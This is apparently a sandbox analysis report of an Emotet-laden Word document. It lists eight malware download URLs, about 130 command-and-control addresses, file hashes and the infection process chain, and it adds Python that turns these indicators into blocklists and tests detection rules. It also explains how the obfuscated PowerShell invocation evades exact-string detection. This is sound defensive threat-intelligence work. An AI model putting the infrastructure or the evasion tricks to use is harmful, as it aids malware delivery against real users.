Analysis

max time kernel: 29s
max time network: 30s
platform: windows10_x64
resource: win10
submitted: 27-10-2020 16:48
Static task: static1
General

Target: 9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893.doc
Size: 179KB
MD5: 195b26f04a16b641bdcecc5084ca815d
SHA1: 8b87e7f06c75a926103c28fd0b7b8fab532af1a4
SHA256: 9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893
SHA512: 54591f496f64ecbb54158c0c175a3499b4cd7fc346bef6a5439f31f783068dcefc4f626f0e11d72607817103fa9e6c9fb0e85ef4ce146cec491dcd3d0aed3236
Malware Config

Extracted: download URLs (the loader locations carried by the document)
http://car4libya.com/cgi-bin/sDBhPqx/
http://ostranderandassociates.com/var/thpY/
http://acredales.com/thank_you/U0u9Z/
http://scw8.net/wp-content/1MkWc/
https://adinterix.com/laybuy-investors/9Ab6/
http://uxnew.com/old/9/
http://www.queensport.nl/accp/dz/
https://bahamianrelief.org/VpHo/ey/
Extracted: emotet, botnet Epoch2, C2 addresses as ip:port
67.163.161.107:80
107.170.146.252:8080
173.212.214.235:7080
167.114.153.111:8080
185.94.252.104:443
110.142.236.207:80
194.187.133.160:443
218.147.193.146:80
172.104.97.173:8080
216.139.123.119:80
50.91.114.38:80
202.134.4.211:8080
113.61.66.94:80
139.99.158.11:443
62.171.142.179:8080
37.139.21.175:8080
190.108.228.27:443
94.23.237.171:443
154.91.33.137:443
201.241.127.190:80
37.179.204.33:80
110.145.77.103:80
72.186.136.247:443
78.24.219.147:8080
200.116.145.225:443
47.36.140.164:80
168.235.67.138:7080
61.76.222.210:80
121.124.124.40:7080
202.134.4.216:8080
190.164.104.62:80
61.19.246.238:443
61.33.119.226:443
98.174.164.72:80
121.7.31.214:80
190.162.215.233:80
24.179.13.119:80
68.252.26.78:80
142.112.10.95:20
220.245.198.194:80
138.68.87.218:443
203.153.216.189:7080
87.106.136.232:8080
95.9.5.93:80
91.146.156.228:80
104.131.11.150:443
5.39.91.110:7080
94.230.70.6:80
209.141.54.221:7080
62.75.141.82:80
172.105.13.66:443
120.150.60.189:80
66.76.12.94:8080
72.143.73.234:443
209.54.13.14:80
172.91.208.86:80
24.178.90.49:80
41.185.28.84:8080
176.113.52.6:443
50.245.107.73:443
176.111.60.55:8080
97.82.79.83:80
85.105.111.166:80
124.41.215.226:80
119.59.116.21:8080
194.4.58.192:7080
115.94.207.99:443
75.143.247.51:80
217.123.207.149:80
162.241.140.129:8080
104.131.123.136:443
50.35.17.13:80
59.125.219.109:443
118.83.154.64:443
37.187.72.193:8080
157.245.99.39:8080
174.106.122.139:80
186.70.56.94:443
186.74.215.34:80
24.230.141.169:80
46.105.131.79:8080
91.211.88.52:7080
172.86.188.251:8080
139.59.60.244:8080
109.74.5.95:8080
190.29.166.0:80
188.219.31.12:80
194.190.67.75:80
182.208.30.18:443
123.142.37.166:80
2.58.16.89:8080
62.30.7.67:443
75.188.96.231:80
123.176.25.234:80
108.46.29.236:80
89.121.205.18:80
78.188.106.53:443
76.175.162.101:80
95.213.236.64:8080
24.137.76.62:80
202.141.243.254:443
184.180.181.202:80
74.214.230.200:80
187.161.206.24:80
68.115.186.26:80
103.86.49.11:8080
190.240.194.77:443
120.150.218.241:443
79.137.83.50:443
49.50.209.131:80
173.63.222.65:80
134.209.144.106:443
112.185.64.233:80
27.114.9.93:80
87.106.139.101:8080
96.245.227.43:80
93.147.212.206:80
139.162.60.124:8080
102.182.93.220:80
89.216.122.92:80
137.59.187.107:8080
74.208.45.104:8080
71.15.245.148:8080
49.3.224.99:8080
94.200.114.161:80
217.20.166.178:7080
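The two Extracted blocks above are the operational output of this report: the URL list is the set of loader download locations the document carries, and the ip:port list is the Epoch2 C2 set. The Python below is an added example, not part of the Triage report, that parses that block as printed into validated, deduplicated blocklist entries. It embeds an excerpt of the report's own config (all eight URLs, the first seven C2 entries and the one on port 20) and surfaces the entry whose port the rest of the list does not use. The parsing rules and the expected-port set are assumptions, not a documented Triage format.

```python
"""Parse the 'Malware Config' block of the report into blocklist-ready indicators.

Added example; the Triage report contains no code. CONFIG_EXCERPT reproduces
the report's two 'Extracted' blocks (all eight download URLs, the first seven
C2 entries plus the one on port 20); the parsing rules and EXPECTED_PORTS are
assumptions, not a published format specification.
"""
import ipaddress
import re
from collections import Counter
from urllib.parse import urlsplit

CONFIG_EXCERPT = """\
Extracted
http://car4libya.com/cgi-bin/sDBhPqx/
http://ostranderandassociates.com/var/thpY/
http://acredales.com/thank_you/U0u9Z/
http://scw8.net/wp-content/1MkWc/
https://adinterix.com/laybuy-investors/9Ab6/
http://uxnew.com/old/9/
http://www.queensport.nl/accp/dz/
https://bahamianrelief.org/VpHo/ey/
Extracted
emotet
Epoch2
67.163.161.107:80
107.170.146.252:8080
173.212.214.235:7080
167.114.153.111:8080
185.94.252.104:443
110.142.236.207:80
194.187.133.160:443
142.112.10.95:20
"""

C2_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")
# Ports the bulk of the C2 list uses (assumption); anything else is surfaced for review.
EXPECTED_PORTS = {80, 443, 7080, 8080}


def parse_config(text):
    """Split the config text into download URLs, validated C2 sockets and leftovers."""
    parsed = {"family": None, "botnet": None, "urls": [], "c2": [], "rejected": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "Extracted":
            continue
        if line.startswith(("http://", "https://")):
            parsed["urls"].append(line)
            continue
        m = C2_RE.match(line)
        if m:
            ip, port = m.group(1), int(m.group(2))
            try:
                addr = ipaddress.ip_address(ip)
            except ValueError:
                parsed["rejected"].append(line)
                continue
            # Sandbox-internal or malformed sockets must not reach a blocklist.
            if not addr.is_global or not 0 < port < 65536:
                parsed["rejected"].append(line)
                continue
            parsed["c2"].append((ip, port))
            continue
        # Bare words after an 'Extracted' header name the family, then the botnet.
        if parsed["family"] is None:
            parsed["family"] = line
        elif parsed["botnet"] is None:
            parsed["botnet"] = line
        else:
            parsed["rejected"].append(line)
    return parsed


def port_histogram(c2):
    """Counter of C2 ports, e.g. {80: 2, 8080: 2, 443: 2, 7080: 1, 20: 1} for the excerpt."""
    return Counter(port for _, port in c2)


def odd_ports(c2):
    """Ports outside EXPECTED_PORTS; for the excerpt this is the lone 142.112.10.95:20 entry."""
    return sorted({port for _, port in c2 if port not in EXPECTED_PORTS})


def blocklist(parsed):
    """Deduplicated hostnames (download stage) and IPs (C2), sorted for a blocklist."""
    hosts = sorted({urlsplit(u).hostname for u in parsed["urls"]})
    ips = sorted({ip for ip, _ in parsed["c2"]}, key=ipaddress.ip_address)
    return hosts, ips


if __name__ == "__main__":
    cfg = parse_config(CONFIG_EXCERPT)
    hosts, ips = blocklist(cfg)
    print(cfg["family"], cfg["botnet"], len(hosts), "hosts,", len(ips), "C2 IPs")
    print("ports:", dict(port_histogram(cfg["c2"])), "unexpected:", odd_ports(cfg["c2"]))
```

Feed the full C2 list from the report into parse_config to get the complete blocklist; the is_global check is there because sandbox reports occasionally carry RFC 1918 addresses from the analysis network, and those must not be pushed to perimeter controls.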
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. Here the flagged parent is wmiprvse.exe, the WMI provider host, which is consistent with the macro starting PowerShell through WMI (Win32_Process.Create) rather than directly. As a result WINWORD.EXE is not PowerShell's parent, and a rule that only looks for Office-spawns-PowerShell would not match this chain.
Processes:
description | pid | pid_target | process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4332 | 2992 | POwersheLL.exe

Emotet Payload (4 IoCs)
Detects Emotet payload in memory.
Processes:
resource | yara_rule
behavioral1/memory/4068-11-0x00000000005A0000-0x00000000005C0000-memory.dmp | emotet
behavioral1/memory/4068-12-0x0000000000A30000-0x0000000000A4E000-memory.dmp | emotet
behavioral1/memory/4460-15-0x00000000005D0000-0x00000000005F0000-memory.dmp | emotet
behavioral1/memory/4460-16-0x0000000000900000-0x000000000091E000-memory.dmp | emotet
Blacklisted process makes network request (1 IoC)
Processes:
flow | pid | process
22 | 4332 | POwersheLL.exe

Executes dropped EXE (2 IoCs)
Processes:
pid | process
4068 | F1iv94s.exe
4460 | activeds.exe

Drops file in System32 directory (1 IoC)
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\KBDHAW\activeds.exe | F1iv94s.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. Note that these reads are attributed to WINWORD.EXE itself and also occur when Office opens benign documents, so on their own they carry little weight; the process chain and the in-memory YARA hits are what support the verdict here.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
pid | process
4756 | WINWORD.EXE (2 hits)

Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes:
pid | process
4332 | POwersheLL.exe (3 hits)
4460 | activeds.exe (6 hits)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
description | pid | process
Token: SeDebugPrivilege | 4332 | POwersheLL.exe

Suspicious use of SetWindowsHookEx (7 IoCs)
Processes:
pid | process
4756 | WINWORD.EXE (7 hits)

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
description | pid | process | target process
PID 4068 wrote to memory of 4460 | 4068 | F1iv94s.exe | activeds.exe (3 hits)
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 4756)
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe (PID 4332; parent wmiprvse.exe, PID 2992, not WINWORD.EXE)
  POwersheLL -ENCOD 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
  (The mixed-case image name and the truncated -ENCOD switch, an accepted prefix of -EncodedCommand, defeat case-sensitive or exact-string matches on the command line while running normally.)
  - Process spawned unexpected child process
  - Blacklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe (PID 4068)
  C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\KBDHAW\activeds.exe (PID 4460, child of F1iv94s.exe)
    "C:\Windows\SysWOW64\KBDHAW\activeds.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
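The chain that matters in this tree is the one that is missing: WINWORD.EXE has no children, and PowerShell's parent is wmiprvse.exe (PID 2992). The Python below is an added example, not code from the report, that rebuilds the parent chain from constructed Sysmon-style process-creation records and runs two rules over it: the textbook "Office process spawns a script host" rule, which misses this instance, and a rule keyed on wmiprvse.exe as the immediate parent, which catches it. It also expands the truncated -ENCOD switch to -EncodedCommand before decoding, because a detection that greps the command line for the full switch name misses this sample. PIDs and image paths come from the report; the parents of WINWORD.EXE and wmiprvse.exe, the untracked parent of F1iv94s.exe (a tree root in the report) and the base64 payload are assumptions.

```python
"""Rebuild the parent chain behind the process tree and test two rules against it.

Added example; the Triage report contains no code. The records are constructed
in a Sysmon Event ID 1 style: PIDs 4756/2992/4332/4068/4460 and the image
paths come from the report, while the parents of WINWORD.EXE and wmiprvse.exe,
the untracked parent of F1iv94s.exe (shown as a tree root in the report) and
the base64 payload are assumptions. SAMPLE_PAYLOAD is an innocuous stand-in,
not the document's real encoded command.
"""
import base64
import ntpath

SAMPLE_PAYLOAD = "Write-Host 'constructed sample'"

# Constructed process-creation records (assumed PPIDs: 3000 explorer.exe, 700 svchost.exe,
# 9999 = parent not captured by the sandbox).
EVENTS = [
    {"pid": 3000, "ppid": 1, "image": r"C:\Windows\explorer.exe"},
    {"pid": 700, "ppid": 1, "image": r"C:\Windows\System32\svchost.exe"},
    {"pid": 4756, "ppid": 3000,
     "image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"},
    {"pid": 2992, "ppid": 700, "image": r"C:\Windows\system32\wbem\wmiprvse.exe"},
    {"pid": 4332, "ppid": 2992,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe",
     "cmdline": "POwersheLL -ENCOD "
                + base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()},
    {"pid": 4068, "ppid": 9999, "image": r"C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe"},
    {"pid": 4460, "ppid": 4068, "image": r"C:\Windows\SysWOW64\KBDHAW\activeds.exe"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def basename(image):
    """Lower-cased file name, so 'POwersheLL.exe' compares equal to 'powershell.exe'."""
    return ntpath.basename(image).lower()


def ancestors(events, pid):
    """Image names of pid's parent, grandparent, ... until the chain leaves the records."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid:
            chain.append(basename(by_pid[pid]["image"]))
    return chain


def office_ancestor_rule(events):
    """Textbook rule: a script host with an Office process anywhere above it. Misses here."""
    return [e["pid"] for e in events
            if basename(e["image"]) in SHELLS and OFFICE & set(ancestors(events, e["pid"]))]


def wmi_parent_rule(events):
    """Rule keyed on what the report flagged: wmiprvse.exe as the immediate parent."""
    return [e["pid"] for e in events
            if basename(e["image"]) in SHELLS
            and ancestors(events, e["pid"])[:1] == ["wmiprvse.exe"]]


# powershell.exe accepts any unambiguous, case-insensitive prefix of a switch.
# (full name, shortest accepted prefix) as implemented by the Windows PowerShell 5.1
# console host; treat the list as an assumption for other hosts and versions.
PS_SWITCHES = [("encodedcommand", "e"), ("executionpolicy", "ex"), ("noprofile", "nop"),
               ("nologo", "nol"), ("noninteractive", "noni"), ("noexit", "noe"),
               ("windowstyle", "w"), ("command", "c"), ("file", "f")]


def normalize_ps_args(cmdline):
    """'POwersheLL -ENCOD X' -> ['-encodedcommand', 'X'], so rules match on full switch names."""
    out = []
    for tok in cmdline.split()[1:]:  # token 0 is the image; paths with spaces are out of scope
        if tok.startswith("-"):
            t = tok[1:].lower()
            hits = [full for full, shortest in PS_SWITCHES
                    if full.startswith(t) and len(t) >= len(shortest)]
            out.append("-" + hits[0] if len(hits) == 1 else tok)
        else:
            out.append(tok)
    return out


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand (any accepted prefix), or None."""
    args = normalize_ps_args(cmdline)
    if "-encodedcommand" not in args:
        return None
    blob = args[args.index("-encodedcommand") + 1]
    return base64.b64decode(blob).decode("utf-16-le")


if __name__ == "__main__":
    ps = next(e for e in EVENTS if e["pid"] == 4332)
    print("chain above 4332:", ancestors(EVENTS, 4332))
    print("office-ancestor rule:", office_ancestor_rule(EVENTS))
    print("wmi-parent rule:", wmi_parent_rule(EVENTS))
    print("decoded:", decode_encoded_command(ps["cmdline"]))
```

Run as a script to print the chain and both rule results. The lesson for detection content is that the Office-ancestor rule and the WMI-parent rule are complementary, not alternatives, and that switch normalisation has to happen before any string match on PowerShell command lines.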
Downloads

C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe
MD5: 44159153fabe28642e068351999c5573
SHA1: 725f004ce99979aa808fa1bfd1d33d0b84146780
SHA256: e3fa57c5e24d254e1f737f20f3ce2f2df786f427d74b6a08b7d86c47f0116a62
SHA512: 8f792696af4d74c5213a51086501abaea7d16d91f800b44ac0fe333012a998e74221b2de3f9a4f39686d4740d853b497293a85b8aef540e51c06355c2d8cdaa9

C:\Windows\SysWOW64\KBDHAW\activeds.exe
MD5: 44159153fabe28642e068351999c5573
SHA1: 725f004ce99979aa808fa1bfd1d33d0b84146780
SHA256: e3fa57c5e24d254e1f737f20f3ce2f2df786f427d74b6a08b7d86c47f0116a62
SHA512: 8f792696af4d74c5213a51086501abaea7d16d91f800b44ac0fe333012a998e74221b2de3f9a4f39686d4740d853b497293a85b8aef540e51c06355c2d8cdaa9
(Identical hashes to F1iv94s.exe: the loader copied itself unchanged into C:\Windows\SysWOW64\KBDHAW\ and renamed the copy activeds.exe. KBDHAW and activeds are both names of legitimate Windows DLLs, so the path blends in with the directory's contents; match on the hash or the write event, not the name.)

Memory dumps:
memory/4068-11-0x00000000005A0000-0x00000000005C0000-memory.dmp: 128KB (emotet YARA hit)
memory/4068-12-0x0000000000A30000-0x0000000000A4E000-memory.dmp: 120KB (emotet YARA hit)
memory/4332-6-0x00007FFE87170000-0x00007FFE87B5C000-memory.dmp: 9.9MB
memory/4332-7-0x000001C65B490000-0x000001C65B491000-memory.dmp: 4KB
memory/4332-8-0x000001C65B680000-0x000001C65B681000-memory.dmp: 4KB
memory/4460-13-0x0000000000000000-mapping.dmp: (mapping only, no size reported)
memory/4460-15-0x00000000005D0000-0x00000000005F0000-memory.dmp: 128KB (emotet YARA hit)
memory/4460-16-0x0000000000900000-0x000000000091E000-memory.dmp: 120KB (emotet YARA hit)
memory/4756-0-0x00007FFE8E7D0000-0x00007FFE8EE07000-memory.dmp: 6.2MB